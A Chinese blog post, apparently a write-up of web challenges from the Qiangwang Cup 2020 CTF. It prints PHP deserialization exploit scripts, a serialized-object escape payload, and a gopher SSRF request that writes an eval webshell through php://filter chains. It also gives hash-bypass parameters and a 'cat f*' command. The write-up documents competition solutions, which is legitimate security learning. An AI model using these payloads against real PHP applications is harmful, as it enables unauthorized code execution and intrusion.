强网杯2020 writeup

被二进制爷爷们带飞Orz

Web

half_infiltration

首先反序列化,由于print之后无论走哪都会有ob_end_clean(),永远也不会输出,所以尝试输出之后让他报错来绕过

图片

这样global$$this就会输出并报错

图片

传入两个User,一个输出,一个报错绕过ob_end_clean()

<?php
$flag='flag{aaaa}';
class Pass
{
    function read()
    {
        ob_start();
        global $result;
        print $result;
    }
}
class User
{
    public $age,$sex,$num;
    function __destruct()
    {
        $student = $this->age;
        $boy = $this->sex;
        $a = $this->num;
        $student->$boy();

    if(!(is_string($a)) ||!(is_string($boy)) || !(is_object($student)))
    {
        ob_end_clean();
        exit();
    }
    global $$a;
    $result=$GLOBALS['flag'];
        //ob_end_clean();
    }
}
if (isset($_GET['x'])) {
    unserialize($_GET['x']);
} 
$a=new Pass();
$b=new User();
$c=new User();
$c->age=$a;
$c->sex="read";
$c->num="this";
$b->age=$a;
$b->sex="read";
$b->num='result';
echo urlencode(serialize([$b,$c]));

读到ssrf.php
图片

内网端口探测为40000,内网服务:

图片

源码处看到form表单,题目告知有uploads文件夹,猜测是文件上传处,发现phpsessid会创建一个文件夹,然后想写shell时发现有过滤,file这里可以用二次url绕一些字符,然后大小写绕base64过滤,content文件内容也有过滤,还把PD9给ban了,考虑用phpfilter组合过滤器绕

图片

生成gopher打40000端口

gopher://127.0.0.1:40000/_POST%2520/index.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250ACookie%253A%2520PHPSESSID%253Dbv2afbkkbbpgkio8tjmai40ob7%250AContent-Length%253A%2520174%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AConnection%253A%2520close%250d%250A%250Afile%253Dphp%253A//filter/%25252577rite%253Dstring.rot13%257Cconvert.Base64-decode%257Cconvert.iconv.utf-7.utf-8/resource%253D1.php%2526content%253DK0FEdz9waHAgZXZhbCgrQUNRQVh3LUdFVCtBRnMtMCtBRjApK0FEcz8rQUQ0LQ

命令执行需要二次编码
图片

这过滤也是挺狠

图片

强网先锋

web辅助

反序列化逃逸,安恒月赛都有类似的题了,没意思

class player{
    protected $user;
    protected $pass;
    protected $admin;
    public function __construct($user, $pass, $admin = 0){
        $this->user = $user;
        $this->pass = $pass;
        $this->admin = $admin;
    }
    public function get_admin(){
        return $this->admin;
    }
}

class topsolo{
    protected $name;
    public function __construct($name = 'Riven'){
        $this->name = $name;
    }

    public function TP(){
        if (gettype($this->name) === "function" or gettype($this->name) === "object"){
            $name = $this->name;
            $name();
        }
    }
    public function __wakeup(){
        $this->TP();
    }
}
class midsolo{
    protected $name;
    public function __construct($name){
        $this->name = $name;
    }
    public function __wakeup(){
        if ($this->name !== 'Yasuo'){
            $this->name = 'Yasuo';
            echo "No Yasuo! No Soul!\n";
        }
    }
    public function __invoke(){
        $this->Gank();
    }
    public function Gank(){
        if (stristr($this->name, 'Yasuo')){
            echo "Are you orphan?\n";
        }
        else{
            echo "Must Be Yasuo!\n";
        }
    }
}
class jungle{
    protected $name = "";
    public function __construct($name = "Lee Sin"){
        $this->name = $name;
    }
    public function KS(){
        phpinfo();
    }
    public function __toString(){
        $this->KS();  
        return "";  
    }
}
function read($data){
    $data = str_replace('\0*\0', chr(0)."*".chr(0), $data);
    return $data;
}
function write($data){
    $data = str_replace(chr(0)."*".chr(0), '\0*\0', $data);
    return $data;
}
$d=new jungle(NULL);
$c=new midsolo($d);
$b=new topsolo($c);
$payload=(serialize($b));
$a="\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0\\0*\\0";
//$username='\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0';
$b='";s:7:"0*0pass";s:0:"";s:8:"0*0admin";'.$payload;
echo $b."\n";
echo read(write(serialize(new player($a,$b))))."\n";

payload

?username=\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0&password=";s:7:"%00*%00pass";s:0:"";s:8:"%00*%00admin";O:7:"topsolo":2:{S:7:"\00*\00\6e\61\6d\65";O:7:"midsolo":1:{S:7:"\00*\00\6e\61\6d\65";O:6:"jungle":1:{S:7:"\00*\00\6e\61\6d\65";N

图片

funhash

?hash1=0e251288019&hash2[]=1&hash3[]=2&hash4=ffifdyop

图片

主动

cat f*

评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇